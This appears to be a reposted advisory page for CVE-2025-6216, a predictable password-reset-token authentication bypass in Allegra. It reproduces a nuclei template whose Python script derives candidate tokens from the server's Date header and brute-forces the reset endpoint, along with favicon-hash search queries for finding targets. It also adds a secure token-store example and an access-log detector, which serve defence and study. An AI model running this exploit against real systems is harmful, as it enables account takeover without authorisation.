Allegra Authentication Bypass via Predictable Password Reset Token

Vulnerability Information

Vulnerability name: Allegra Authentication Bypass via Predictable Password Reset Token

Vulnerability ID:

  • CVE: CVE-2025-6216

Vulnerability type: Access control bypass

Severity: Critical

Description: Allegra is a widely used application, deployed mainly in enterprise services, that provides features such as password recovery. Because it is so widely deployed, the impact of this vulnerability is broad. The vulnerability lies in the password recovery mechanism: the password reset token is generated from a predictable value, which allows an attacker to bypass authentication. The technical root cause is insufficient randomness in the generation of the reset token, so an attacker can predict or replay it. Because no authentication is required to exploit it, an attacker can easily bypass the authentication mechanism and obtain unauthorized access, potentially exposing sensitive data or compromising system integrity. The severity stems from the fact that a remote attacker can exploit it without any preconditions, and the exploitation can be automated, posing a major threat to affected systems.
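The root cause described above is a reset token derived from a value the client can predict (the server's clock). The following is an added example, not Allegra's code and not part of the nuclei template, of how a reset flow avoids that class of defect: the token comes from the OS CSPRNG, only its SHA-256 digest is stored, it is bound to the account, it expires after 8 hours (the window the PoC below relies on; reused here as an assumption), and it can be redeemed once. The `ResetTokenStore` class, its in-memory list and the injectable clock are hypothetical constructs for this example.

```python
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import List, Optional

# 8-hour validity window, the same 28,800,000 ms offset the PoC on this page relies on (assumed here)
TOKEN_TTL_SECONDS = 8 * 60 * 60


@dataclass
class PendingReset:
    email: str
    token_digest: bytes   # SHA-256 of the token; the token itself is never stored
    expires_at: float     # Unix timestamp (seconds)
    used: bool = False


class ResetTokenStore:
    """In-memory stand-in (hypothetical) for the table a real application would persist."""

    def __init__(self, clock=time.time):
        self._clock = clock                     # injectable so tests can advance time
        self._pending: List[PendingReset] = []

    def issue(self, email: str) -> str:
        # 32 bytes from the OS CSPRNG (256 bits). Nothing an unauthenticated client can
        # observe (the Date header, request timing, the account name) narrows the search;
        # the only way to hold a valid token is to receive it out of band.
        token = secrets.token_urlsafe(32)
        self._pending.append(PendingReset(
            email=email,
            token_digest=hashlib.sha256(token.encode()).digest(),
            expires_at=self._clock() + TOKEN_TTL_SECONDS,
        ))
        return token  # delivered to the account's mailbox, never echoed to the requester

    def redeem(self, token: str) -> Optional[str]:
        """Return the account e-mail for a valid, unexpired, unused token; otherwise None."""
        digest = hashlib.sha256(token.encode()).digest()
        now = self._clock()
        for entry in self._pending:
            # constant-time comparison: no early exit that leaks how many bytes matched
            if hmac.compare_digest(entry.token_digest, digest):
                if entry.used or now > entry.expires_at:
                    return None
                entry.used = True  # single use: a replayed link is rejected
                return entry.email
        return None


if __name__ == "__main__":
    store = ResetTokenStore()
    link_token = store.issue("user@example.com")   # constructed account
    print("first redemption:", store.redeem(link_token))
    print("replay:", store.redeem(link_token))
```

The design point is that the server stores only the digest, so a database read does not yield usable links, and that expiry is tracked server-side rather than encoded into the token, so the token carries no structure a client could reconstruct.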

Vendor: alltena

Product: Allegra

Affected versions: *

Search query: http.favicon.hash:"284403119"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/8e1558b13436acb7e082231f215ab37ea212e214/code%2Fcves%2F2025%2FCVE-2025-6216.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details

id: CVE-2025-6216

info:
  name: Allegra - Authentication Bypass via Predictable Password Reset Token
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Allegra calculateTokenExpDate Password Recovery Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the password recovery mechanism. The issue results from reliance upon a predictable value when generating a password reset token. An attacker can leverage this vulnerability to bypass authentication on the application.
  impact: |
    An attacker can exploit this vulnerability to bypass authentication and gain unauthorized access to the application, potentially compromising sensitive data and system integrity.
  remediation: |
    Upgrade Allegra to version 8.1.4 or 7.5.2 or later to fix the predictable password reset token vulnerability.
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-25-410/
    - https://alltena.com/en/resources/release-notes/release-notes-for-release-8-1-4-and-release-7-5-2
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6216
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 9.8
    cve-id: CVE-2025-6216
    cwe-id: CWE-640
    cpe: cpe:2.3:a:alltena:allegra:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: alltena
    product: allegra
    shodan-query: http.favicon.hash:"284403119"
    fofa-query: icon_hash="284403119"
  tags: cve,cve2025,allegra,auth-bypass,predictable-token,reset

variables:
  email: "admin@mydomainxxx.com" # Change to a test account

flow: http(1) && code()

http:
  - raw:
      - |
        POST /resetPassword.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        email={{email}}&fromAjax=true&_dc=1750669432104&perspectiveType=&appActionID=

    extractors:
      - type: regex
        name: date_header
        part: header
        internal: true
        group: 1
        regex:
          - "Date: (.*)"

    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "emailSent"
          - '"success":true'
        condition: and

code:
  - engine:
      - py
      - python3 # requires python to be pre-installed on system running nuclei
    source: |
      import requests
      import hashlib,os
      import time
      from datetime import datetime, timezone
      from email.utils import parsedate_to_datetime

      def get_server_time(response):
          date_header = response.headers.get('Date')
          if date_header:
              return parsedate_to_datetime(date_header)
          return None

      def main():
          BASE_URL = os.getenv("BaseURL")
          EMAIL = os.getenv("email")
          # the Date header extracted by the http request above is passed in as an env var
          date_header = os.getenv("date_header")
          # parsedate_to_datetime(None) raises, so only parse when the header was extracted
          server_time = parsedate_to_datetime(date_header) if date_header else None
          if not server_time:
              return
          server_time_ms = int(server_time.timestamp() * 1000)
          expiry_time_ms = server_time_ms + 28800000
          base_expiry_sec = (expiry_time_ms // 1000) * 1000
          for ms in range(1000):
              candidate_expiry_ms = base_expiry_sec + ms
              token = hashlib.sha256(str(candidate_expiry_ms).encode()).hexdigest()
              test_url = f"{BASE_URL}/resetPassword!confirm.action?ctk={token}"
              r = requests.get(test_url, allow_redirects=False)
              if 'com.trackplus.app.logon.ResetPasswordApplication' in r.text:
                  print(test_url)
                  return

      if __name__ == "__main__":
          main()

    matchers:
      - type: dsl
        dsl:
          - contains(code_response, "/resetPassword!confirm.action?ctk=")

    extractors:
      - type: dsl # type of the extractor
        dsl:
          - '"Reset URL: " + code_response'
# digest: 4b0a00483046022100d59748595f6cc13b789b45b1b70fa7456e85389d00ebade00416bc13322030ae022100fdc0a9151f91f606b9f69221833d79ca5cbe89c2eb8d1da315759fa149b5f350:f54de283b4eb358da492cc866d2be612
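The template above reaches a valid link by issuing up to 1000 GET requests to /resetPassword!confirm.action with different ctk values within seconds of one POST to /resetPassword.action. That pattern shows up in ordinary web-server access logs, where a legitimate user presents exactly one ctk value. The following is an added example, not part of the nuclei template or of Allegra, that parses combined-format access-log lines and flags any client presenting many distinct ctk values in a short window. The log lines are constructed sample data, and the 5-minute window and threshold of 20 distinct tokens are assumed tuning values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional
from urllib.parse import parse_qsl

CONFIRM_PATH = "/resetPassword!confirm.action"
WINDOW = timedelta(minutes=5)   # assumed observation window
THRESHOLD = 20                  # assumed: distinct ctk values from one client inside WINDOW

# Combined-log-format line: client, identd, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line; None if it does not match the expected layout."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    return ev


def find_token_guessing(lines: List[str], window=WINDOW, threshold=THRESHOLD) -> List[dict]:
    """Flag clients that present at least `threshold` distinct ctk values within any window."""
    per_ip: Dict[str, List[tuple]] = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "GET":
            continue
        path, _, query = ev["path"].partition("?")
        if path != CONFIRM_PATH:
            continue
        ctk = dict(parse_qsl(query)).get("ctk")
        if ctk:
            per_ip[ev["ip"]].append((ev["ts"], ctk))

    alerts = []
    for ip, events in per_ip.items():
        events.sort()
        best = 0
        # sliding window anchored at each request: count distinct tokens that follow within `window`
        for i, (start, _) in enumerate(events):
            distinct = {ctk for ts, ctk in events[i:] if ts - start <= window}
            best = max(best, len(distinct))
        if best >= threshold:
            alerts.append({"ip": ip, "distinct_tokens": best})
    return alerts


def _constructed_sample_log() -> List[str]:
    """Constructed sample, not real traffic: one client walking 25 candidate tokens."""
    lines = [
        '203.0.113.10 - - [12/Jul/2025:09:59:58 +0000] "POST /resetPassword.action HTTP/1.1" 200 64',
        '198.51.100.7 - - [12/Jul/2025:10:00:03 +0000] "GET /resetPassword!confirm.action?ctk=a1b2c3 HTTP/1.1" 200 512',
        '198.51.100.7 - - [12/Jul/2025:10:00:09 +0000] "GET /index.action HTTP/1.1" 200 2048',
    ]
    for i in range(25):
        lines.append(
            f'203.0.113.10 - - [12/Jul/2025:10:00:{i:02d} +0000] '
            f'"GET {CONFIRM_PATH}?ctk={i:064x} HTTP/1.1" 200 512'
        )
    return lines


SAMPLE_LOG = _constructed_sample_log()

if __name__ == "__main__":
    for alert in find_token_guessing(SAMPLE_LOG):
        print(alert)
```

The response status is deliberately not part of the rule: the template keys on a marker string in a 200 response body, so failed guesses and the final hit look alike at the status level, and the signal is the volume of distinct tokens per client rather than any individual request.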



http://example.com/2025/07/12/github_3215977554/
Author: lianccc
Published: July 12, 2025